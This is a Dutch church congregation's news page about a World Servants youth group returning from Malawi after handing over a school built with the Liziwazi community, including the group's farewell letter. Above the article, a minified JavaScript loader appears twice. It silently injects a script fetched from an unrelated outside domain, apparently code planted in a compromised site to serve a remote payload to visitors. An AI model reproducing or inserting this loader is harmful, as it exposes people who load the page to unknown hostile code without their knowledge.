;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); World Servants MA419 | gebouw overgedragen, weer terug in Nederland - PKN Damwâld

World Servants MA419 | gebouw overgedragen, weer terug in Nederland

Gepubliceerd op: dinsdag 3 september 2019

Zaterdag 31 augustus is de groep weer veilig in Nederland aangekomen. De groep had nog een korte stop in Worden nodig om afscheid te nemen na de intense 3 weken samen. Het geduld van de ouders werd hierdoor ook goed op de proef gesteld, maar het weerzien met vrienden en familie was heel fijn! Wat hebben ze een goede tijd in Malawi gehad. Moe maar voldaan zijn ze inmiddels allemaal naar huis. De laatste groep van deze zomer is thuis!

Gebouw overgedragen

De klaslokalen zijn nu echt helemaal van de gemeenschap van Liziwazi. Het werk van de groep zit erop! De overdracht ging, op z’n Malawiaans, gepaard met dansen en zingen. Er is een tijd van komen en een tijd van gaan. De tijd van gaan is nu aangebroken voor de Liziwazi-groep. De klus is geklaard, samen met de gemeenschap bouwden ze een prachtige school.

De groep vertelt van hun avonturen in Kasungu en het afscheid in Liziwazi!

Dag allemaal,

Gisteren zijn wij aangekomen in Lilongwe waar we ons klaar maken voor de lange reis die ons te wachten staat. De afgelopen dagen hebben we afscheid moeten nemen van ons geliefde Liziwazi, wat bestond uit het opleveren van de school, het kinderfeest en een gezamenlijk eindfeest met de locals. Nadat we woensdagochtend uit Liziwazi zijn vertrokken kwamen we we rond de middag aan bij het safaripark. Daar hebben we mogen genieten van de prachtige natuur, maar ook weer van een normaal bed en stoel mét rugleuning. Maar…, toen we gisterochtend wilden gaan ontbijten werd dit feest abrupt verstoort door een olifant die ook trek had. Hij stal daarom een heel tafelkleed met eten. Hier hoort u als ouders vast thuis wel meer over. Voor nu wensen wij jullie een fijne dag en hopen we jullie morgen weer in de armen te sluiten.

Met een lang snuit blaast de olifant dit verhaal uit.